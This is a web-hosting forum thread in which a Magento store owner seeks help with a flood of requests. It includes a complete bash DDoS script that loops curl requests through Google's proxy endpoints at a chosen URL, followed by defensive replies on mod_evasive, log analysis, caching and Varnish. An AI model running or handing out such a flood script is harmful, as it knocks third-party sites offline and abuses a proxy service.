I'm getting too much server load and I can't get it down:

Code:
top - 14:28:32 up 4 min,  2 users,  load average: 30.93, 10.74, 3.92
Tasks: 255 total,  50 running, 204 sleeping,   0 stopped,   1 zombie
Cpu(s): 75.9%us, 20.8%sy,  0.0%ni,  0.0%id,  0.0%wa,  0.0%hi,  0.0%si,  3.3%st
Mem:   4187996k total,  2799896k used,  1388100k free,    11716k buffers
Swap:  8385920k total,        0k used,  8385920k free,   251072k cached

  PID USER  PR  NI  VIRT  RES  SHR S %CPU %MEM   TIME+  COMMAND
 3112 web3  20   0  205m  26m 9260 R    8  0.6  0:05.90 php-cgi
 3155 web3  20   0  224m  45m 9272 R    8  1.1  0:07.59 php-cgi
 3000 web3  20   0  224m  44m 9272 R    8  1.1  0:08.55 php-cgi
 3011 web3  20   0  230m  50m 9252 R    8  1.2  0:06.79 php-cgi
 3099 web3  20   0  205m  26m 9260 R    8  0.6  0:06.87 php-cgi
 3114 web3  20   0  223m  44m 9260 R    8  1.1  0:07.94 php-cgi
 3317 web3  20   0  207m  28m 9264 R    8  0.7  0:03.57 php-cgi
 3468 web3  20   0  208m  28m 9028 R    8  0.7  0:00.98 php-cgi
 3477 web3  20   0  205m  24m 8876 R    8  0.6  0:00.91 php-cgi
 3483 web3  20   0  204m  24m 8876 R    8  0.6  0:00.86 php-cgi
 3484 web3  20   0  204m  24m 8876 R    8  0.6  0:00.85 php-cgi
 3493 web3  20   0  204m  24m 8876 R    8  0.6  0:00.81 php-cgi
 3517 web3  20   0  227m  47m 9204 R    8  1.2  0:00.69 php-cgi
 2977 web3  20   0  220m  41m 9264 R    8  1.0  0:10.24 php-cgi
 3009 web3  20   0  217m  38m 9248 R    8  0.9  0:09.99 php-cgi

The load comes from this DDoS script, which abuses Google to generate the requests:

Code:
#!/bin/bash
# ElGATO
#
function start {
    echo "[*] Enviando `echo $2` Requisicoes..."
    for a in `seq $2`
    do
        id=$((RANDOM%3999999+3000000))
        nohup curl "https://plus.google.com/_/sharebox/linkpreview/ c=$url&t=1&_reqid=$id&rt=j" -k -A "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20110101 Firefox/6.0" > /dev/null 2>&1 &
        nohup curl "https://images2-focus-opensocial.googleusercontent.com/gadgets/proxy?url=$urlclear&container=focus" -k -A "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0" > /dev/null 2>&1 &
    done
    echo "[*] ainda atacando `echo $urlclear`"
    echo "[*] zzzzz por 10 Secondos"
    sleep 10
    start url $2 urlclear
}

echo 'ElGATO - X.L.'

if [ "$#" -lt 2 ]; then
    echo "Uso: $0 <big file> <Requests>"
    echo "Example: $0 http://www.dominio.com/arquivogrande.tar.gz 1000"
    echo ""
    exit 0
fi

case $2 in
    *[!0-9]* ) echo "$2 is not numeric" && exit 1;;
esac

echo "Atacar -->" $1

match1=/
repl1=%2F
match2=:
repl2=%3A
url=$1
urlclear=$1
url=${url//$match1/$repl1}
url=${url//$match2/$repl2}

echo ""
echo "[*] Loop! CTRL+C para parar"
echo ""

start url $2 urlclear

I have used mod_evasive and mod_security to stop it, without success. Does anyone have a different idea?
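A quick way to see who is actually generating the load is to count requests per client address and per User-Agent in the Apache access log. A minimal sketch, assuming the default Debian log path and the combined log format (adjust the path to your vhost's log file):

Code:
# Top 20 client IPs by request count.
awk '{print $1}' /var/log/apache2/access.log | sort | uniq -c | sort -rn | head -20

# Top 20 User-Agents (the User-Agent field when the combined format is split on double quotes).
awk -F'"' '{print $6}' /var/log/apache2/access.log | sort | uniq -c | sort -rn | head -20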
mod_evasive blocks by IP address, so if the Google requests come from many different IP addresses, mod_evasive may not detect them as long as the request counts stay below the limits. You should try to lower the limits in your mod_evasive configuration. Besides that, you should check whether your server can be sped up to handle the load better:

1) Install php5-xcache.
2) Use mysqltuner to optimize your MySQL settings.
3) Install offload/caching plugins in your CMS.
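For the first two points, a rough example on a Debian/Ubuntu system (package names are assumptions and differ between releases; run as root):

Code:
# Opcode cache for PHP -- cuts the per-request compile time of Magento's many PHP files.
apt-get install php5-xcache
/etc/init.d/apache2 restart      # restart so the PHP processes pick up the new module

# Prints tuning suggestions based on MySQL's current runtime statistics.
apt-get install mysqltuner
mysqltuner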
I have tried this config:

Code:
<IfModule mod_evasive20.c>
    DOSHashTableSize    3097
    DOSPageCount        3
    DOSSiteCount        30
    DOSPageInterval     30
    DOSSiteInterval     60
    DOSBlockingPeriod   10
    DOSLogDir           "/var/log/apache2/evasive"
    DOSEmailNotify      [email protected]
</IfModule>

This is the one that was suggested to me, but it still has no effect on a Magento website... any other ideas?
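Since the flood arrives through Google's proxies rather than from a handful of client IPs, another angle (not mentioned above, so take it only as a sketch) is to deny requests by whatever User-Agent the proxied requests actually carry in your access log. The "proxy-ua-pattern" string is a placeholder, and the conf.d path assumes a Debian-style Apache 2.2 layout:

Code:
# Replace "proxy-ua-pattern" with the string you really see in the access log
# for the flood requests before enabling this.
cat <<'EOF' > /etc/apache2/conf.d/block-proxy-flood.conf
SetEnvIfNoCase User-Agent "proxy-ua-pattern" bad_proxy
<Location />
    Order Allow,Deny
    Allow from all
    Deny from env=bad_proxy
</Location>
EOF

apache2ctl configtest && /etc/init.d/apache2 reload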
How many pages per second can your server deliver from your CMS if you test it with ApacheBench? The command is, e.g.:

Code:
ab -c 20 -n 100 http://www.yourdomain.tld/

Please disable mod_evasive before you run the test.
As you asked, I took mod_evasive off; the test result is here, thanks for any help:

Code:
root@alice:~# ab -c 20 -n 100 http://www.pimentawebstore.com.br/
This is ApacheBench, Version 2.3 <$Revision: 655654 $>
Copyright 1996 Adam Twiss, Zeus Technology Ltd, http://www.zeustech.net/
Licensed to The Apache Software Foundation, http://www.apache.org/

Benchmarking www.pimentawebstore.com.br (be patient).....done

Server Software:        Apache/2.2.16
Server Hostname:        www.pimentawebstore.com.br
Server Port:            80

Document Path:          /
Document Length:        31209 bytes

Concurrency Level:      20
Time taken for tests:   24.602 seconds
Complete requests:      100
Failed requests:        0
Write errors:           0
Total transferred:      3169300 bytes
HTML transferred:       3120900 bytes
Requests per second:    4.06 [#/sec] (mean)
Time per request:       4920.435 [ms] (mean)
Time per request:       246.022 [ms] (mean, across all concurrent requests)
Transfer rate:          125.80 [Kbytes/sec] received

Connection Times (ms)
              min  mean[+/-sd] median   max
Connect:        0    1   3.0      0       8
Processing:  1210 4717 1461.6   4370   10639
Waiting:     1208 4714 1460.8   4370   10639
Total:       1211 4718 1462.3   4370   10639

Percentage of the requests served within a certain time (ms)
  50%   4370
  66%   4549
  75%   4846
  80%   4962
  90%   6949
  95%   8037
  98%   9486
  99%  10639
 100%  10639 (longest request)
root@alice:~#
You can try Varnish to cache in front of Apache. I tried it and it's amazing. You can also try the Unixy plugin to configure it from cPanel.
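A minimal sketch of the Varnish idea, assuming a Debian/Ubuntu install where Varnish takes over port 80 and Apache is moved to 8080 (paths and option names are the stock ones for that setup; adjust to yours):

Code:
# Install Varnish and put it in front of Apache.
apt-get install varnish

# In /etc/default/varnish, make varnishd listen on port 80, e.g.:
#   DAEMON_OPTS="-a :80 -T localhost:6082 -f /etc/varnish/default.vcl -s malloc,256m"
# In /etc/varnish/default.vcl, point the backend at Apache:
#   backend default { .host = "127.0.0.1"; .port = "8080"; }
# In /etc/apache2/ports.conf, change "Listen 80" (and NameVirtualHost, if set) to 8080.

/etc/init.d/apache2 restart && /etc/init.d/varnish restart

Out of the box Varnish does not cache requests that carry cookies, and Magento sets a session cookie on most pages, so expect the biggest win on static files and anonymous traffic unless you add extra VCL for it.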